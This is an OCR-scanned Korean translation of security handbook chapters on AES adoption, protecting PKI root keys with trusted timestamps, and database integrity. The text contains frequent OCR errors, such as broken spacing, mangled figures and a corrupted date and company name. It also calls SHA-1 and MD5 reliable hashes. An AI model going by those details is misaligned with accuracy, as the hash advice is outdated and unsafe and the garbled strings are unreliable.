(그러나 비밀은 아닌)체계에 AES 를 사용할 필요가 있었다. 정부는 수만대의 체계들에 
DES 와 Triple-DES 를 실현하고 있었기때문에 AES 로 갱신하는데 드는 시간과 비용은 막 
대한것이 였 다. 

AES 는 현존 정 부시 설 의 DES , Triple-DES 그리 고 다른 암호화체 계 들을 교체 하는데 
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막대한 시 간과 자원의 투자를 요구하였 다. AES 도입 의 지 연을 더 욱 심 화시 킨 요인은 
Triple-DES 가 기 본적 으로 안전하므로(그의 주되 는 우려점 은 속도에 있 다) 그것 을 교체하 
도륵 강요할만한 안전상 긴박성 은 제 기되지 않는다는 사실이 였다. AES 가 필요할수는 있 
지만 정부기관들에 있어서 그것을 실지로 실현하는것과는 반대로 AES 도입을 기권하는편 
이 보다 쉬 웠 다. AES 로 교체하는데 드는 예 산과 시 간의 압박으로 하여 교체하여 야 할 
많은 부분들과 실리상 문제들을 안은채로 그 이행과정은 천천히 일어 날것이다. 

재 정 봉사분야에 서 도 역 시 Triple-DES 에 막대 한 투자를 하고 있 다. 재 정 봉사분야에 서 
는 현재 AES 리 용에 대 한 특별 한 요구가 없 고 Triple-DES 가 우세 를 차지 하고 있 으므로 
과연 어 느 은행업표준화업 체 가 AES 사용을 요구하겠는가 하는것 이 의 심 스럽다. 

DES ( X 9.23-1955 로 암호화됨， Encryption of Wholescale Financial Message ) 하나만 사용 
하려 는 시 도는 X 9 회 의 ( X 9 TG -25-1999 를 참고)에 의 하여 움츠러 들고 있지 만 X 9 도 역 시 
다른 알고리 듬이 실현될 때 까지 DES 를 계속 사용하는것 을 허 락하고 있다. 

그러 나 AES 는 하드웨 어 및 쏘프트웨어적인 실현에 효과성 이 있고 높은 성능을 가지 
고 있지만 대규모적인 비정부싸이트의 실현，갱신에 대한 실리상의 압박초래， Triple-DES 
의 리용과 결합 등의 어려운 형세를 찾아 볼수 있다. 어차피 이 알고리듬이 전세계적으 
로 보급되 기 까지 는 많은 시 일 이 걸 릴 것 갈다. 
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제 3 4 장. 공개열쇠계층구조의 보호 


져프리 씨 그라보우 


공개열쇠 기반 (PKI: Public Key Infrastructure) 은 항상 뿌리열쇠 라는 웃준위열쇠 와 함께 
설계되여 왔다. 이 단일열쇠는 계층구조에서 그 단일열쇠 밑에 있는 모든 실체들에 대한 
신뢰 의 출발점 을 보장한다. 만일 이 뿌리열쇠 가 타개 되 기 라도 하면 전반적신뢰 계 층구조 
는 곧의 문시되게 된다. 

뿌리열쇠 는 수자식 으로 서 명하는 하위의 인증국 (CA: Certificate Authority) 들에 근본적 
으로 영 향을 마친다. 뿌리열쇠의 타개는 사용자에 게 비 합법적 인 CA 가 완전히 타당한것 
처럼 보이게 할것이다. 그러면 사용자는 자기가 믿고 있는 안전성이 터무니 없는것이라 
는것도 모르고 그 거래에 완전히 말려 들것이다. 

단일뿌리열쇠는 단일점 고장을 초래한다. 

체계의 임의의 부분을 비극적인 고장으로부터 막도록 일련의 억제력과 안정성을 가 
진 체계로 설계하고 건설하는것은 보안에서 표준적인 실천규범이다. 그러나 모든 실제적 
인 목적을 실현하는데서 이러한 실천은 계층적인 PKI 에 관하여서는 무시되여 왔다. 

이 장에서는 이 단일점 고장을 제거하는 체 계를 제 안하는데 목적 을 둔다. 

암호기 법 적 으로 안전한 수자식 시 간도장 (CSDT: Cryptographically Secure Digital 
Timestamp) 들은 문서 보관，수자식 인증 등을 포함하여 여 러 가지 목적 에 리 용되 여 왔다. 
CSDT 를 PKI 내 에서 발행되는 모든 수자식 인증서들에 추가함으로써 사람들은 현재 그 인 
증서가 타당한가 하는것은 물론 어떤 점에 타당한가 하는것을 확인할수 있는 방법론을 
가질수 있게 되였다. 

CSDT 를 리 용하여 보호되 는 PKI 내 의 인증서 들은 알맞게 설정 해 놓기 만 하면 뿌리열쇠 
의 타개 로부터 구출될수 있다. 만일 뿌리열쇠 가 로출된다 하여도 인증서들은 여전히 자기 
의 초기값을 가지고 있으며 잃는것이란 새로운 인증서를 만들수 있는 능력이 전부이다. 그 
리하여 거래는 계속될수 있으며 회복공정에는 다만 뿌리열쇠의 교체만이 필요할뿐이다. 

여 기서 제 안된 체계의 주목할만한 우점은 그것 이 현존 PKI 표준에 설정된 파라메터 
들안에 서 동작한다는것 이 다. 


공개열쇠기반 ( PKI ) 


공개열쇠(또는 비대칭)암호기법은 보통 공개열쇠와 비밀열쇠라고 부르는 서로 다른 
두개의 열쇠를 리용한다. K PUB (수신자)에 의하여 암호화된 임의의 정보는 오직 K PRI (수신 
자)에 의 하여서 만 복호화될수 있으며 반대 로 K PRI (수신자)에 의하여 암호화된 임의의 정 
보는 K PUB (수신자)에 의 해서 만 복호화될수 있다. 두개 의 열쇠 들은 수학적 으로 련결되며 
공개열쇠로부터 비밀열쇠를 결정한다는것은 계산불가능하다. 이로부터 수신자는 하나의 
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열쇠쌍을 만들고 K PUB (수신자)는 임의의 사람이 다 볼수 있는 위치에 공개할수 있다. 일 
단 송신자가 K PUB (수신자)의 복사본을 가지면 암호화된 정보는 비밀열쇠를 보낼 필요없 
이 수신자에게 송신될수 있다. 

송신자: 

DATA + K PUB (수신자)+암호화알고리 듬 = EK ■(수신자)[자료] 

수신자: 

EK PUB (수신자)[자료] + K PRI (수신자)+복호화알고리 듬 = 자료 

이것의 반대과정도 역시 성립한다. 만일 수신자가 자료를 K PRI (수신자)로 암호화하면 
그것은 K PUB (수신자)로 복호화될수 있다. 이것은 임의의 사람이 정보를 복호화할수 있고 
신뢰성이 담보되지 않았다는것을 의미하지만 자료가 K PUB (수신자)를 리용하여 복호화 될 
수 있다면 오직 K PRI (수신자)로써만 그것을 암호화했을수 있으며 따라서 그 자료를 보낸 
사람을 확인할수 있을것이다. 이것이 바로 수자식서명의 배경에 놓인 원리이다. 그러나 
실제 수자식서명체계에서는 처리시간을 절약하기 위하여 오직 자료의 하쉬만을 암호화/복 
호화한다. 

표준 PKI 계층구조 

비대칭열쇠체계들은 전통적대칭열쇠체계들이 안고 있던 열쇠관리문제를 해결 하였지 
만 《관리신뢰성》이라는 새로운 문제를 초래하였다. 이 문제는 《내가 리용하고 있는 
공개열쇠가 해당수신자의것이라고 어떻게 장담하겠는가?》라는 질문을 낳게 한다. 전형 
적 으로 제 3자공격 ( man - in - the-middle attack ) 이 라고 부르는 이 문제는 제:3자(공격 자)가 자 
기의 공개열쇠 를 송신자에 게 보낼 때 발생하게 되는데 송신자는 어 리석게 도 그것 이 수신 
자의 공개열쇠 인것 으로 믿 으며 반대 로 공격 자가 자기 의 공개열쇠 를 수신자에 게 보내 면 
수신자는 그것을 송신자의 공개열쇠 인것 으로 믿게 된다. 명백 히 알수 있는바와 같이 이 
것은 공격자가 송신자와 수신자중 그 누구도 자기를 전혀 알아 차리지 못한채로 그들사 
이 의 모든 통신을 읽 고 수정할수 있도록 한다. 

이 문제 는 인증국 ( CA ) 을 리용함으로써 해 결된 다. CA 는 송신자의 인증서 와 수신자의 
인증서 에 수자식 으로 서 명한다. 인증서 는 그 소유자들의 이 름과 공개열쇠 를 포함하는데 
그것 들의 무결성 은 CA 의 공개열쇠를 리용하여 검사할수 있다. 그러 나 이것은 송신자와 
수신자가 갈은 CA 에 속하여 야 한다는것 을 의 미한다. 만일 송신자와 수신자가 갈은 CA 의 
성원이 아니라면 CA 들의 계층구조가 수립되여야 한다(그림 34-1 참고). 

그림 34 — 1에서 매 실체는 계층구조의 보다 우에 있는 실체 에 의하여 서명되는 자기 
자신의 인증서를 가진다. 이것은 알려 진 실체로부터 알려 지지 않은 실체에로 신뢰(仕 ust ) 
를 전달하는데 리용되는 방법 이 다. 례외 로 되는것은 뿌리 인데 이것은 자체 로 서명되는 
인증서를 만든다. 뿌리는 CA 들과의 직 접적 인 교섭과 업무관계를 통하여 신뢰를 수립하 
여 야 한다. 
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인증서 디렉터리 
CERT (부러，부러) 
CERT (CA#1 3 뿌리) 
CERT (CA#2 3 뿌리) 
CERT (Alice, C_ 
CERT (Bob, CA#2)^ 


그림 34-1. 기초 RKI 계층구조 

이 환경에서 Alice 는 문서에 수자식으로 서명하고 그것을 자기 인증서의 복사본은 
물론 CA #1 의 인증서와 함께 Bob 에게 보낼수 있다. Bob 는 이미 CA #2 와 믿음관계를 가지 
고 있고 CA #2 는 뿌리와 신뢰관계를 가지고 있기때문에 Bob 는 CA #2 의 인증서를 확증하 
고 다음 Alice 의 인증서를 확증할수 있다. 일단 Bob 가 Alice 의 인증서를 믿으면 그는 자 
기가 Alice 의 공개열쇠로 확증할수 있는 임의의것이 Alice 의 비밀열쇠에 의 하여 서명되였 
을것 이며 따라서 Alice 로부터 왔을것 이 라고 믿는다. 

뿌리열쇠타개의 후과 

이 계층구조의 문제점은 뿌리비밀열쇠의 안전에 대한 전적인 믿음에 있다. 만일 
K PR i (뿌리 )가 공격 자에 의하여 타개 되 면 그 공격 자는 기 만적 인 CA #3 을 창조하고 그 다 
음 그 CA 밑 에 기 만적 인 사용자들을 만들어 놓을수 있다. CA #3 이 뿌리 의 공개열쇠 를 리 
용하여 명확하게 확증될수 있으므로 Alice , Bob 그리고 뿌리를 믿고 있는 모든 사람들은 
CA #3 밑의 임의의 사용자들을 수락할것이다. 이로하여 Alice , Bob 그리고 이 계층구조에 
있는 그밖의 모든 사람들은 기만적인 사용자들을 믿게 되며 바로 거기에 문제가 있다는 
것을 알지 못하는 사태에 빠지게 된 다. 

만일 이 런 일 이 일 어 난다면 전체 체계는 풍지박산이 된다. 믿음에 대 한 기 초가 허 
물어 졌으므로 그 어떤 거 래도 진행할수 없게 된다. 이 사태로 하여 빚 어 지는 보다 더 
충격적 인 후과는 Alice 와 Bob 가 그 문제 에 대 하여 알아 차리 자마자 CA #3 밑의 사용자를 
에 대한 믿음을 중단할뿐아니라 전체적인 계층구조에 있는 그 누구도 믿을수 없게 될것 
이 라는것 이 다. CA #3 이 기 만적 으로 창조되 였 으므로 기 만적 인 CA 들은 몇개 라도 만들어 질 
수 있으며 있을수 있는 CA 들로부터 믿지 말아야 할 CA 들을 결정 하기 위한 아무러 한 방 
도도 없다. 

믿 어 야 할 CA 들을 결정할수 없 다면 믿 어 야 할 사용자들의 인증서 를 결 정 하기 위 한 방 
도가 더 는 없 다. 이 것 은 전체 적 인 계 층구조를 우로부터 아래 까지 완전히 붕괴 시 키 게 된다. 
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암호기법적으로 안전 한 수자식시간도장만들기 


암호기 법 적 으로 안전한 수자식 시 간도장 ( CSDT ) 은 결코 새 로운것 이 아니 다. 여 러 해동 
안 안전한 시간도장을 넓은 분야에서 여러가지로 적용해 오고 있다. 이 장의 목적은 실 
제적인 CSDT 를 만드는데까지 세부를 깊이 파고 들자는데 있는것 이 아니라 오히 려 수자 
식 인증서안에 포함되 는 최 소한의 필 요한 자료를 지 적하자는데 있 다. 

시간도장 

물론 CSDT 의 기본구성요소의 하나가 시간도장 그자체이므로 《 믿을수 있는》시간 
원천이 필요하다. 이 것은 여 러 가지 인정된 방법 으로 달성할수 있으며 이 것을 만들기 위 
하여 CSDT 내의 실제 적 인 시 간도장은 정 확한 시 간이 라는것을 가정할것 이 다. 

대 용량거 래 환경 을 조성 하기 위하여 동일 한 시 간에 두개 의 CSDT 가 있을수 없게 끔 
시 간도장에 16 bit 순서 번 호가 붙여 진 다. 이 타이 브레 이 커 값 (tiebreaker value ) 은 새 로운 매 
시간도장마다 재설정되여야 한다. 따라서 시간분해능이 0.0001 s 라면 동일한 0.0001 s 내에 
발행될수 있는 CSDT 들의 가능한 개수는 모두 65,536개나 되지만 정확한 순서의 CSDT 를 
만드는것은 미래에 결정될수 있는 일이다. 

인증서의 하쉬 

특별한 인증서에 CSDT 를 결합하기 위해서는 일부자료가 해당 인증서에 련결되도록 
포함되 여 야 한다. SHA -1 이 나 MD 5 와 같이 이 미 알려 져 있는 믿 을만한 알고리 듬에 의하 
여 생성되는 인증서의 하쉬는 이 련결을 보장하는데 리용된다. 이것은 인증국이 서명처 
리를 하는 동안 계산되고 암호화되는 바로 그 하쉬이다. 

보다 중요하게는 CSDT 의 시 간은 CA 가 인증서를 서명할 때의 시 간이 라는것 을 아는 
것 이 결정 적 인 문제 이 다. 따라서 그런 하쉬 가 포함될것 이 아니 라 CA 에 의하여 완전한 
수자식서명 이 인증서 에 첨 가되 여 야 한다. CA 의 서명 을 리용하여 또한 미 래의 CA 서명표 
준의 변화를 보장할수 있다. 

그러나 이 장의 목적의 하나는 현존 인증서표준을 변경시킴이 없이 거기에 새로운 
기 능이 하나 더 추가되는것 만큼 누구도 서명후 인증서 에 정 보를 추가할수 없다는것을 강 
조하자는것 이 다. 오히 려 CSDT 는 인증서 가 CA 에 의하여 서명되 고 X .509 v 3 확장마당에 삽 
입되기에 앞서 그 인증서에 추가되여야 한다. 

인증국의 인증서하쉬 

다른 하나의 추가적 인 조치의 하나로서 CA 의 인증서의 하쉬 가 CSDT 에 내장되여 어 
느 CA 가 시 간국 ( TA : Time Authority ) 에 요청 하는가에 대 한 기 록을 제 공한다. 
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시간국의 수자식서명 

함부로 변경 되 는것 을 막기 위하여 CSDT 는 표준수자식서 명 을 리용하여 암호기 법적 
으로 서명되여야 한다. CSDT 의 전체 자료량이 작으므로 이것은 TA 의 비밀열쇠로 자료 
마당들을 간단히 암호화하는것으로써 달성된다. 그러나 앞으로의 증대와 추가될수 있는 
첨 부마당들을 허 용하기 위하여 안전하게 모든 자료의 하쉬 들을 암호화하는것 이 더 좋다. 

계층구조의 분리 


물론 X .509 표준은 이 미 시 간도장을 포함하고 있으므로 자기 CA 에 의하여 인증서 가 
서 명된 날자와 시 간이 결정될수 있다. 그러 나 뿌리비밀 열쇠 가 타개되고 기 만적 인 CA 가 
만들어 지 면 그 CA 는 인증서 를 서 명 하기 에 앞서 시 간을 요구되 는 값으로 간단히 설정할 
수 있 다. 

제 안되 는 한가지 방법 은 CA 를 자기 의 부분으로 가지 는 계 층구조밖에 존재하는 어 떤 
국에 의하여 서명되는 시 간도장을 포함하는것 이 다(그림 34-2 참고). 

CA 가 하나의 인증서 를 만들 때 그것 은 인증서 에 포함될 공개열쇠 와 다른 자료를 취 
득하기 위한 정 상과정 을 거 친 다. 그러 나 인증서 를 서 명 하기 에 앞서 시 간국 ( TA ) 으로부터 
CSDT 가 요구될것 이 다. 이 CSDT 는 그때 TA 에 의 하여 생성되 며 CA 에 로 귀환될것 이 다. 
CA 는 CSDT 를 인증서 에 첨 부하고 다음 보통의 방법 으로 그에 서 명할것 이 다. 



그림 34-2. 시간국을 가진 PKI 


뿌리#1이 어떤 점에서 타개되면 뿌리 #1에로의 접근이 CSDT 를 만들수 있는 능력을 
주지 않으므로 타개되기전에 창조된 모든 CA 들은 여전히 믿을수 있다. 그러면 사용자들 
은 특정한 날자후에 뿌리 에 의하여 서명되는 그 어떤것도 믿을수 없지 만 그 날자전에 서 
명된것은 아무것 이 나 믿을만한 가치 가 있다는것을 알수 있게 된다. 
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CSDT 를 포함하는 인증서발급절차 


CSDT 를 공개열 쇠 인증서 에 첨 부하는 절 차는 다음과 같다. 

1. 사용자가 공개/비 밀 열 쇠 쌍을 생 성한다. 

2. 사용자가 공개열쇠와 사용자특정정보를 등록국 (RA: Registration Authority) 에 보낸다. 

3. RA 는 사용자의 요청을 정 당하게 접수하고 CA 에 인증서요청을 보낸다. 

4. CA 는 인증서 를 형 성 하고 사용자인증서하쉬 (UCH: User Certificate Hash) 를 계산한 
다. 

5. CA 는 수자식으로 서명되는 요청을 UCH 를 포함하고 있는 시간국에 보낸다. 

6. TA 는 요청 을 접 수하고 CA 의 공개열 쇠 인증서 를 리 용하여 그 요청 에 대 한 CA 의 
서명을 정당화한다. 

I. TA 는 자기의 안전한 시 간원천으로부터 현재 시 간을 얻는다. 

8. TA 는 순서 타이 브레 이 커 계 수값을 계 산한다. 

9. TA 는 CSDT 의 내 용을 다음과 같이 형 성한다. 

ᄀ. UCH (절차 4) 

L. 시간도장(절차 7) 

n. 타이 브레 이커계수(절차 8) 

CA 의 인증서의 하쉬(절차 6 에 리용된것과 갈은 값) 

10. TA 는 CSDT 의 내 용들의 하쉬 를 계 산한다. 

II. TA 는 자기의 암호열쇠로 하쉬를 암호화한다. 

12. TA 는 CA 에 로 CSDT 를 귀 환한다. 

13. CA 는 TA 의 공개 열쇠인증서를 리 용하여 CSDT 에 대한 TA 의 서명을 정당화한다. 

14. CA 는 TA 에 보낸 UCH 와 대조하여 CSDT 의 UCH 를 검 증한다. 

15. CA 는 사용자인증서에 CSDT 를 첨부한다. 

16. CA 는 완성 된 인증서 에 관한 표준서명 과정 을 수행한다. 

17. CA 는 사용자에게 수자식 인증서를 보낸다. 

수복 절차 


보증을 담보하는 임의의 체 계 에서는 일부 문제 있는 사건에 대처한 행동계획을 가지 
는것 이 필요하다. CA 가 타개될 때 최소한의 필요한 절차에 대 한 요약을 아래 에 준다. 

주어 진것: 

• CA 뿌리 에 의하여 서명된 CA 

• TA 뿌리 에 의하여 서 명된 TA 
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• 공개/비 밀 열 쇠 쌍을 발생 한 10,000명 의 사용자 

• 매 사용자는 공개 열쇠 인증서 발급과정 을 거쳤다. 

• CA 뿌리열쇠는 어떤 형태의 공격에 의하여 타개된다. 


CSDT 가 사용되지 않는 기반에서 000명의 사용자들의 인증서들은 모두 곧 문제시 
될수 있으며 그이상의 거래에 대하여 믿을수 없게 된다. 전형적인 계획은 CA 가 미리 두 
번째 교체 뿌리 를 만들어 놓고 첫번째것 이 배 포되 였으면 두번째 뿌리 의 자체서 명된 공개 
열쇠 인증서가 배포될것을 요구한다. 그러면 사용자들은 첫번째 뿌리에 대한 신뢰를 중지 
해 야 한다든지 또는 그것 을 자기 들의 응용프로그람에 서 삭제해 야 한다는것 을 알게 된 다. 
그다음 모든 사용자들은 새 로운 열쇠 쌍을 생 성하여 야 하며 업 무가 정 상으로 돌아 오기 
전에 새로운 뿌리아래에 등록하는 과정을 거처 야 한다. 

이 것 은 명 백 히 상당한 시 간과 로력 을 요하며 전자업 무거 래 를 실 행 하려 는 사용자들에 
게 상당한 불편을 줄수 있다. 또한 사용자수가 증가함에 따라 수복시간은 선형으로 증가 
한다. 

CSDT 가 채 용되 고 CSDT 인식응용프로그람들이 리용되 면 그 많은 로력 이 필요 없게 
된다. 타개가 되였다고 판정되면 곧 다음과 같이 해야 한다. 

• TA 는 타개된 열쇠아래 에서는 더 이상 요청 을 접수하지 않을것 이 라는것을 알아야 
한다. 

• 자기의 사용자들을 알아야 한다. 

• 새 로운 열 쇠 들의 조를 생 성하여 야 한다. 

• 타개된 열쇠아래 에서는 더 이상 인증서들을 발급하지 말아야 한다. 

사용자들은 CA 에 게 타개날자/시 간이 있는 자기 들의 응용프로그람에 대 하여 무조건 
알려 주어야 한다. 앞으로 모든 인증서의 타당성은 CA 의 인증서는 물론 CSDT 로 검사된 
다. 만일 인증서에 대한 CA 의 서명이 타당하지만 CSDT 가 없거나 타개된 후의 시간을 
지적한다면 그 인증서는 거부되며 사용자는 자기들이 부당한 인증서를 가지고 있었다는 
것을 알게 된다. 


알려 진 문제점들 


하쉬 생성，암호화，복호화와 같은 사건들은 령 아닌 존속 (non-zero duration) 과정 들이 므 
로 실제적 인 인증서발급시 간은 CSDT 내의 시 간이 아니 라는것 이 인정되 여 야 한다. 이것은 
CSDT 내 의 시 간과 인증서 자체 내 의 시 간이 절대 시 간으로 리용되 는것 이 아니 라 오히 려 인 
증서 가 타당하게 고찰되 는 시 작점 으로 리용되 므로 문제 시 될 것 은 없 다. 

임의의 암호화체 계 와 같이 체계의 임의의 타개 에 대 한 시 기적절한 지 식은 공격 자의 
어떤 《행운의 기회》를 제한하는데서 중요한 요인으로 된다. 이런 경우 CA 야 말로 자 
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기 사용자들에 게 자기 가 타개당하였 다는것 을 알려 주어 야 한다. TA 의 타개 에 관한 정 보도 
역시 사용자들에게 알려 져야 하지만 그 결과로 어떤 직접적인 행동을 할 필요는 없다. 

CA 의 근본책 임 의 하나는 그 CA 서 명 을 믿 으려는 모든 사람들이 그 CA 의 공개열쇠 
인증서에 접근하도록 하는것이다. 이것은 역시 TA 에서도 마찬가지인데 TA 는 자기의 공 
개열쇠들에서 믿음을 수립 하기 위한 류사한 방법들을 리용하여 야 한다. 이것은 CA 와 그 
사용자들에게 추가적 인 부담을 줄수 있다. 

O 야 
J-L ―I 


이 장에 서 제 안되 고 론의 된것 은 지 금까지 존재하지 않았던 PKI 에 서 의 여 유를 제 공 
하는 방법 이 다. 뿌리비 밀 열쇠 를 여 러 부분으로 분할하는 이 전의 방법 들聲 단일점 고장에 
대한 2중조종을 만들어 내였지만 어떤 체계적인 여유를 제공하지는 못하였다. 

이 체계는 PricmaterhouseCoopers 에 의 하여 수립된 신뢰성 있는 제3자봉사업체 인 
beTRUSTed 로부터 원형이 만들어 지고 있다는것에 주목할만한 가치가 있 다. 여러 PKI 쏘 
프트웨 어 업 체 들과 협 동하여 검 사해 보면 실 지 환경 에 서 이 체 계 의 리 용성 과 안전성 을 증명 
할수 있다. 

임의의 암호화체계나 규약의 사용과 같이 여기에 서술된 CSDT 들을 사용하고 있는 
체계는 가능한 취 약점들이 나 공격 자가 체계를 타개할수 있는 부분들을 찾아 내기 위하여 
제 3자들에 의하여 분석 되 고 검 사되 여 야 한다. 
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제 6 편 

보안구성방식과 모형 


이 편에서는 자료기지의 무결성에 관한 중요한 문제를 취급한다. 저자는 자료기지무 
결성의 정의와 개념들올 론의한 다음 자료기지관리프로그람을 실행하며 자료기지의 무결 
성을 보존하는 방법을 설명하였다. 이 편의 결론으로부터 자료기지무결성은 임의의 보안 
계획의 본질적인 요소라는것을 상기할수 있다. 끝으로 자료기지의 무결성을 보존하는것 
과 관련한 저자의 권고는 정확성과 어느정도 류사한 체계의 무결성을 믿을수 있게 하는 
어려운 목표에로 안내하는《료리책》의 역할을 할것이다. 


제 3 5장. 자료기지의 무결성에 관한 고찰 

월리엄 휴 머리 

이 장에서는 자료기지의 무결성과 관련된 개념을 고찰한다. 이 장에서는 자료기지무 
결성의 개념을 자료무결성 및 자료기지관리체 계무결성의 개 념과 대비적으로 설명 한다. 
그 목적은 자료기지의 소유자들과 운영 자들에게 무결성을 보존하는 방법과 관련한 일련 
의 권고를 주자는데 있다. 


개념 및 해설 


여기서는 자료기지무결성과 관련된 문제들을 해설하며 또 그 문제에만 국한된 일부 
정의들과 개 념들을 서술한다. 

무결성 

무결성은 전일적이고 완결되여 있으며 손상이 없다는 의미의 속성이다. 다시 말하면 
외부적인 간섭이나 오염이 없고 깨뜨릴수 없으며 요구조건이나 기대를 만족시킨다는 의 
미를 내포한다. 

자료는 그것이 내부적으로 일관성을 가질 때(가령 책들이 잘 편성되여 있을 때)와 
그 목적하는바를 반영하고 있을 때(가령 책들이 기업활동과 조건을 정확하게 반영하고 
있을 때) 무결성을 가진다고 말할수 있다. 체계인 경우에는 그것이 대부분의 시간을 완 
결된 기술설명서에 따라 동작하고 예측할수 있는 오동작을 하며 그 오동작의 원인이 명 
백하여 그것을 제때에 효과적으로 퇴치할수 있으며 그리고 순차적으로 회복할수 있을 때 
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무결성을 가진다고 말할수 있다. 

자료기지 

무결성의 견지에서 보면 자료기지는 련관된 혹은 호상 의존하는 자료요소들의 전일 
적인 집합으로 정의할수 있다. 달리 표현하면 자료기지는 코드화된 자료요소들과 그 요 
소들사이의 구체적인 관계로 표현되는 정보의 전일적인 집합이다. 자료기지는 사용자，사 
용 혹은 응용프로그람사이에서 공유된다. 

자료기지의 추상화는 비교적 새로운것이며 현대를퓨터와 거의 시기를 같이 한다. 약 10 
년전 마이 크로를퓨터용의 자료기 지관리쏘프트웨어 가 출현 할 때 까지 자료기 지 의 추상화는 
해석하기 어 려웠다. 콤퓨터가 출현하기전에도 기업활동과 관련한 영 업회계장부와 갈은 상사 
형자료의 집 합들이 존재하였다. 자료기 지 라는 용어는 대 장카드나 3 X 5 카드와 같은 매체 에 
일반적으로 기록되는 대부분자료들에 적절하게 적용할수 있다. 그렇지만 최대한의 형식성과 
엄밀성 그리고 체 계성 을 가진 자료집합들에 한해서만 흔히 자료기지 라는 말을 쓴다. 

자료기지 에서 정 보는 코드화된 자료요소형식 으로 명시 적 으로 표현될수 있다. 종업원 
이름이 일반적인 실례로 된다. 그러나 자료기지에는 자료요소들사이의 명시적인 혹은 암 
시적인 결합형식으로 표현되는 다른 정보도 있다. 

관계 는 자료요소들사이 의 특수한 결 합방식 이 다. 례 를 들어 종업 원자료기 지레 코드의 
각이한 마당 ( field ) 은 종이우에서와 꼭같이 론리 적 으로 련관된다. 매 개 마당의 의미 와 개 
체 성 ( identity ) 은 부분적 으로는 그 문맥 에 의 하여 결정 된다. 이 정 보는 최 소한도로 자료요 
소자체에서의 정보만큼 중요하다. 

관계 는 자료 그자체 (관계 자료)에 서 표현 되거 나 자료기 지 (구조화된)안에 서 요소들의 
배럴이나 순서로 표현되기도 하며 관계(가령 색인순차관계 혹은 객체지향관계)를 명시적 
으로 표현하거나 부호화하는 자료에 대한 자료라고 할수 있는 메타자료에서도 표현될수 
있다. 자료기지는 관계 들이 원래 어 떻게 표현되는가(표현방법)에 의하여 특징지 어 질수 
있지 만 실천적 으로 모든 자료기 지 들은 결 합된 관계 를 리 용한다. 례 를 들어 관계 형자료기 
지라고 하는 자료기지에서 일부 관계는 구조(즉 표나 그림)로，일부는 자료(즉 다른 표에 
대 한 참조)로 그리고 일부는 메 타자료 즉 렬들의 이름으로 표현된다. 

자료기지무결성 

자료기지는 그것이 정보를 자료로 보존할 때 즉 자료와의 관계가 유지될 때 무결성 
을 가진 다고 말할수 있 다. 자료기 지 무결 성 은 레 코드(기 록)들의 무결성 을 의 미한다. 자료 
기지무결성은 한편으로는 자료의 무결성，다른 한편으로는 자료기지관리 체 계의 무결성과 
독립적이며 따라서 대조될수 있다. 

자료기지관리체계 

자료기지무결성 의 견지 에서 자료기지관리체 계는 자료기지 를 구축하고 유지 하며 기 억 
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하고 보존하며 응용프로그람에 자료기지를 제공하고 또한 응용프로그람을 대 신하여 자료 
기지를 제공하는 일반적이고 추상적이며 자동화된 체계를 의미한다. 

자료기지관리자는 자료요소들사이의 관계를 표현하기 위하여 그것들이 주로 의거하 
는 방식의 이름으로 특징지어 진다. 즉 두 자료요소사이의 관계가 표준적으로 자료자체 
례컨대 자료요소의 내용(두 종업원레코드는 갈은 부서번호를 가진다)이나 혹은 자료의 
순서 (종업 원 A 는 이 름마당의 분류순서 에 서 B 보다 앞에 놓인 다)를 담은 자료기 지관리 자 
를 관계형자료기 지 관리 자라고 부론다. 관계 가 두개 의 요소들이 물리 적 으로 보관되 는 방 
식(례를 들어 갈은 부서안의 모든 종업원들의 이름은 함께 기 억되거 나 혹은 종업 원 A 는 
항상 B 앞에 배 렬된다)을 담은 자료기 지관리 자를 구조화형자료기 지관리 자라고 부론다. 

관계무결성 

관계 무결 성 (Relational Integrity ) 은 자료요소들사이의 특수한 관계를 보존하는 자료기 
지무결성의 한 측면이다. 

참조무결성 은 관계무결성의 한 실례이며 특수경우이 다. 참조 ( reference ) 는 한 레 코드 
의 값이 일반적으로는 레코드형 이 다른 레코드를 지적하는 관계이다. 자료기지무결성의 
견지에서 참조는 자료기지가 관계를 보존할 정도로 무결성을 가진다고 말할수도 있는 하 
나의 실례이며 동시 에 례증으로 된다. 

레코드안에 부서번호가 있는 종업원레코드(부서레코드라고 부르는)의 경우를 고찰하자. 
만일 종업 원레코드에서 부서 번호가 N 이 라면 그때 참조무결성은 부서 N 에 대 한 부서 레코드 
가 있을것 을 요구한다. 참조무결성 은 대 응하는 부서레 코드가 없었던 부서 번호를 가지 는 종 
업 원레코드의 구축，임의의 종업 원레코드가 부서레코드 N 을 지적 하는 한 그것(부서레코드 
的의 삭제 그리 고 종업 원 레 코드가 지 적 하는 하나이 상의 부서 레 코드 N 을 금지 할것 이 다. 

지 적하여 야 할것 은 이 류형 의 무결성 은 요구에 따라서 만 가능하다는것 이 다. 즉 그 
어떤 공식적인 요구나 필요성，법적실행이 없이도 그런 참조무결성의 조건들이 우연히 
지 어 지 는 경 우도 있 다는것 이 다. 또한 무결성은 응용프로그람이 나 자료기지관리체 계를 
리용하여 실현되 거 나 시 행 될수 있다. 일 반적 으로는 자료기 지 가 응용프로그람들에 서 공유 
될수 있도록 그리고 응용프로그람을 리용하는 자료기지가 다른 자료기지에 의존할 필요 
가 없도록 자료기지관리체계에서 참조무결성을 실현하는것이 더 좋다. 

방 법 


이 부분에서는 자료기지관리 자를 실현하며 자료기지의 무결성을 보존하는 몇 가지 방 
법 들을 론의한다. 

국부화 


정의에 따르면 자료기지는 전일적인 집합체이다. 다시 말하면 자료기지의 모든 요소 
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들과 모든 관계들은 그 자료기지의 개체성에 관하여 필수적이다. 만일 임의의 요소나 관 
계가 분실되거나 파손된다면 그때 개체성과 무결성은 파괴된다. 물론 이것은 둘 혹은 그 
이상의 독립적 인 자료기지를 포함할수 있는 물리적인 자료기지관리자와 독립 이다. 그렇 
지만 모든것들은 갈으므로 자료기지의 요소들을 다 함께 보관하면 자료기지의 무결성을 
보존하는데 도움이 된다. 그러므로 대부분의 자료기지관리자들은 자료기지를 다 같은 곳 
에 국부적으로 보관하려고 한다. 

단일소유과정 

국부화의 중요한 형 식의 하나는 단일소유과정 이 다. 자료기지 는 전일적 인 집 합체 이므로 
자료기지안의 모든것들을 관찰하고 자료기지를 관리하여 자료기지의 무결성을 책임지는 단 
일한 과정 이 분명히 있어 야 한다. 이 단일과정을 관리 하는 프로그람이 자료기지관리자이 다. 

여유자료 

자료기지를 보관하는 매체와 장치들보다 자료기지를 더 믿음성 있도록 하기 위하여 
대부분의 자료기지관리자들은 어떤 류형의 여유자료를 사용한다. 그 자료는 그것을 다른 
방법 으로 표현하는데 필요한 최소비트수보다 더 많은 비트수로 기록된다. 

